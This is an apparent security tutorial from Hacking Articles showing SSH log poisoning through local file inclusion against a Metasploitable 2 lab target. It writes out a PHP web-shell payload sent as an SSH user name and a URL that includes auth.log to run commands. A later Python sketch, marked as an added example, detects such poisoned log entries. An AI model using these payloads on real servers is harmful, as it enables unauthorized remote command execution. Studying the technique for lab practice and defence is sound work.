
Web Server Exploitation with SSH Log Poisoning through LFI


In this article you will learn how to gain unauthorized access to a web server that suffers from a local file inclusion (LFI) vulnerability, with the help of the auth.log file. To perform this attack, first read my previous article, which will help you create a local file inclusion vulnerability manually.

Attacker: Kali Linux

Target: Metasploitable 2

Open a terminal in Kali Linux and connect to the target using the SSH service:

ssh msfadmin@192.168.1.105

From the screenshot you can see that I am connected to the target PC. Now type the following command to check the permissions of the auth.log file:

ls -l /var/log/auth.log

If you look at the screenshot again, the highlighted text shows that read and write permission has been given to the auth.log file.

Since we know that the auth.log file has read permission, type the following command to view its logs:

tail -f /var/log/auth.log

The highlighted text shows the log entry for the valid user msfadmin.

Now open another terminal in Kali, where I will try to connect to the web server using a fake user name and then confirm whether any log entry is generated inside auth.log for the invalid user.

ssh hacker@192.168.1.105

When you move back to the previous terminal, you will find that it has created a log entry for the invalid user hacker, which you can also check in the screenshot.

This confirms that auth.log records an entry for every failed and successful login when we try to connect to the web server. Taking advantage of this feature, I will now send PHP code as the fake user name, and it will be added automatically to auth.log as a new log entry.

ssh '<?php system($_GET['c']); ?>'@192.168.1.105

When you check the log again, you will find that the PHP code has been added as a new log entry.

I have already created the LFI vulnerability manually on the web server; if you want to create it yourself, see the previous article linked above.

In the screenshot you can see that when I browsed the lfi.php file, it showed an error that looks like a local file inclusion vulnerability.

Now include the auth.log file through the file parameter by entering the following URL in the browser:

192.168.1.105/lfi/lfi.php?file=/var/log/auth.log

In the screenshot you can read the warning that it cannot execute a blank command. This means our PHP code containing the cmd command was injected successfully; now we only need to send a command as the parameter.

Here it will dump the contents of auth.log as well as execute the command given through cmd. In the screenshot you can view both the log and the process state.

In the same way, execute pwd through cmd and view the result in the screenshot.
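From the defender's side, the poisoned entry is easy to spot because sshd writes the client-supplied login name into auth.log verbatim, and a name containing PHP tags can never be a real account. The following detection sketch is an added example, not part of the original article; the sample log lines, source IPs, the account-name policy regex and the function name scan_auth_log are constructed assumptions.

```python
import re

# sshd messages that echo the client-supplied login name (older builds log
# "Illegal user"; newer ones append "port N").
SSHD_USER = re.compile(
    r"sshd\[\d+\]: (?:Failed \S+ for )?(?:[Ii]nvalid|[Ii]llegal) user "
    r"(?P<user>.*) from (?P<ip>[0-9A-Fa-f:.]+)(?: port \d+)?(?: ssh2)?\s*$"
)
# Conservative shape of a real Unix account name (assumption: site policy).
VALID_NAME = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}\$?$")
# Fragments that only make sense if the log is later parsed as PHP.
CODE_MARKERS = ("<?", "?>", "$_", "system(", "eval(", "passthru(", "exec(")


def scan_auth_log(lines):
    """Return findings for login names that cannot be genuine account names."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = SSHD_USER.search(line)
        if not m:
            continue
        user = m.group("user")  # greedy match: the name may contain spaces
        if VALID_NAME.match(user):
            continue  # ordinary failed login, e.g. "hacker"
        markers = [c for c in CODE_MARKERS if c in user.lower()]
        findings.append({
            "line": lineno,
            "source_ip": m.group("ip"),
            "user": user,
            "severity": "high" if markers else "medium",
            "markers": markers,
        })
    return findings


# Constructed sample lines modelled on the entries the article describes.
SAMPLE = [
    "Jul  3 10:01:11 metasploitable sshd[4821]: Accepted password for msfadmin from 192.168.1.104 port 40112 ssh2",
    "Jul  3 10:02:40 metasploitable sshd[4830]: Invalid user hacker from 192.168.1.104",
    "Jul  3 10:04:02 metasploitable sshd[4835]: Invalid user <?php system($_GET[c]); ?> from 192.168.1.104",
    "Jul  3 10:04:05 metasploitable sshd[4835]: Failed password for invalid user <?php system($_GET[c]); ?> from 192.168.1.104 port 40150 ssh2",
    "Jul  3 10:05:19 metasploitable sshd[4840]: Invalid user Admin Backup from 192.168.1.77 port 51822",
]

if __name__ == "__main__":
    for finding in scan_auth_log(SAMPLE):
        print(finding)
```

A high-severity finding here is worth correlating with web access-log requests whose file parameter points at /var/log/auth.log, since the injected name is harmless until the log is included by the vulnerable page.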

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Web Server Exploitation with SSH Log Poisoning through LFI appeared first on Hacking Articles.

